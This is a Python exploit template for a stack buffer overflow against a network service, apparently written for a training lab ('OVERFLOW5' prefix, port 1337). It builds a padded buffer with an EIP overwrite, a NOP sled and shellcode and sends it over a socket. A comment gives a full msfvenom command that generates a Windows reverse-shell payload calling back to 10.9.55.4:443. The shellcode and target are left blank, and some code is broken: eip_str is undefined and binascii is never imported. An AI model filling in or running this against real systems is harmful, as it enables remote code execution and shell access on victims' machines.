exploit-template.py

import socket, time, sys, struct, os


def send_data(data: bytes, timeout=5) -> None:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    connect = s.connect((ip, port))
    s.recv(1024)
    if type(data) == str:
        data = data.encode()
    s.send(data)
    s.recv(1024)
    s.close()


def exploit(offset):
    # shellcode here
    # > msfvenom -p windows/shell_reverse_tcp LHOST=10.9.55.4 LPORT=443  EXITFUNC=thread -b "\x00\x08\x2c\xad" -f python -v shellcode
    shellcode = b""

    # EIP value to overwrite, without the 0x
    eip_value = ""

    padding = "A" * offset
    eip = struct.pack("<I", int(eip_str, 16))
    nops = binascii.unhexlify("90" * 32)

    # only if 2nd stage payload required
    #  register = input("Enter payload register (esp): ").strip()
    #  assembly = asm(f"jmp {register}; add eax, 4")
    #  padding_offset = len(padding) - len(nops) + len(shellcode)
    #  buffer = nops + shellcode + padding[padding_offset:].encode() + eip + esp.encode()

    buffer = padding.encode() + eip + nops + shellcode

    try:
        print("[+] exploiting.. ")
        send_data(prefix + buffer + suffix)
    except socket.timeout:
        print("[-] Timed out")


def main():
    global ip, port, timeout, prefix, suffix

    ip = ""
    port = 1337
    timeout = 5
    prefix = "OVERFLOW5 ".encode()
    suffix = "\r\n".encode()

    offset = 314
    badchars = "\\x00\\x08\\x2c\\xad"

    exploit(offset)


if __name__ == "__main__":
    main()